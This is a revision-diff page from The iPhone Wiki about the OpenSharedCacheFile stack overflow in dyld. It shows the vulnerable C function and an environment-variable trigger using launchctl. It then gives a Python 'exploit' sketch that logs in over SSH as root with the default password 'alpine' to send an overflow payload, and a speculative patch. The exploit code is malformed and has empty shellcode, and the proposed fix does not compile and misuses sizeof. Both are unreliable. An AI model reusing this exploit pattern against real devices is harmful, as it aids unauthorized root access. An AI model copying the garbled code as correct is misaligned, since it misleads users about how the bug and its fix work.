Difference between revisions of "OpenSharedCacheFile"

From The iPhone Wiki
Jump to: navigation, search
(Created page with "The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow == Opensharedcachefile() function == int openSharedCacheFile() { char path[1024]...")
 
m (Apple's fix: Add a space)
 
(11 intermediate revisions by 4 users not shown)
Line 1: Line 1:
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow
+
The OpenSharedCacheFile bug was found by [[i0n1c]]. This bug is a simple stack overflow.
 
== Opensharedcachefile() function ==
 
== Opensharedcachefile() function ==
int openSharedCacheFile()
+
int openSharedCacheFile()
{
+
{
char path[1024];
+
char path[1024];
strcpy(path, sSharedCacheDir);
+
strcpy(path, sSharedCacheDir);
strcat(path, "/");
+
strcat(path, "/");
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
+
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
return ::open(path, O_RDONLY);
+
return ::open(path, O_RDONLY);
}
+
}
   
== Triggering the vuln ===
+
== Triggering the vuln ==
   
 
To trigger it, run the following
 
To trigger it, run the following
DYLD_SHARED_CACHE_DIR = “A” * 2000 \
+
DYLD_SHARED_CACHE_DIR = "A" * 2000 \
DYLD_SHARED_REGION = private /bin/launchctl
+
DYLD_SHARED_REGION = private /bin/launchctl
 
This will overflow the PC register making it a stack overflow.
 
This will overflow the PC register making it a stack overflow.
  +
  +
== Exploiting it ==
  +
  +
Since this bug can takeover the PC register, you first need to know where the bug starts
  +
for now lets say it crashes after 1024 A's, so your payload to get root would be
  +
junk = "A" * 1024
  +
shellcode = ""
  +
payload = "DYLD_SHARED_CACHE_DIR"
  +
actual = payload+junk+shellcode \
  +
cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"
  +
ssh = paramiko.SSHClient()
  +
server = "" #whatever IP
  +
ssh.connect(server, username="root", password="alpine")
  +
ssh.exec_command(actual)
  +
ssh.exec_command(cmd)
  +
  +
== Apple's fix ==
  +
  +
I'm guessing they added an if-statement to check for the size sSharedCacheDir
  +
so like this.
  +
  +
extern void _ZN4dyld4haltEPKc(const char* msg) __attribute__((noreturn));
  +
void __stack_chk_fail()
  +
{
  +
_ZN4dyld4haltEPKc("stack buffer overrun");
  +
}
  +
  +
if(sizeof(sSharedCacheDir >= 1024){
  +
__stack_chk_fail();
  +
}

Latest revision as of 04:51, 5 March 2021

The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.

Opensharedcachefile() function

int openSharedCacheFile()
{
  char path[1024];
  strcpy(path, sSharedCacheDir);
  strcat(path, "/");
  strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
  return ::open(path, O_RDONLY);
}

Triggering the vuln

To trigger it, run the following

DYLD_SHARED_CACHE_DIR = "A" * 2000 \
DYLD_SHARED_REGION = private /bin/launchctl

This will overflow the PC register making it a stack overflow.

Exploiting it

Since this bug can takeover the PC register, you first need to know where the bug starts for now lets say it crashes after 1024 A's, so your payload to get root would be

 junk = "A" * 1024 
 shellcode = ""
 payload = "DYLD_SHARED_CACHE_DIR" 
 actual  = payload+junk+shellcode \
 cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"             
 ssh = paramiko.SSHClient()
 server = "" #whatever IP 
 ssh.connect(server, username="root", password="alpine")
 ssh.exec_command(actual)
 ssh.exec_command(cmd)

Apple's fix

I'm guessing they added an if-statement to check for the size sSharedCacheDir so like this.

 extern void _ZN4dyld4haltEPKc(const char* msg) __attribute__((noreturn));
 void __stack_chk_fail()
 {
 _ZN4dyld4haltEPKc("stack buffer overrun");
 }
 if(sizeof(sSharedCacheDir >= 1024){
 __stack_chk_fail();
 }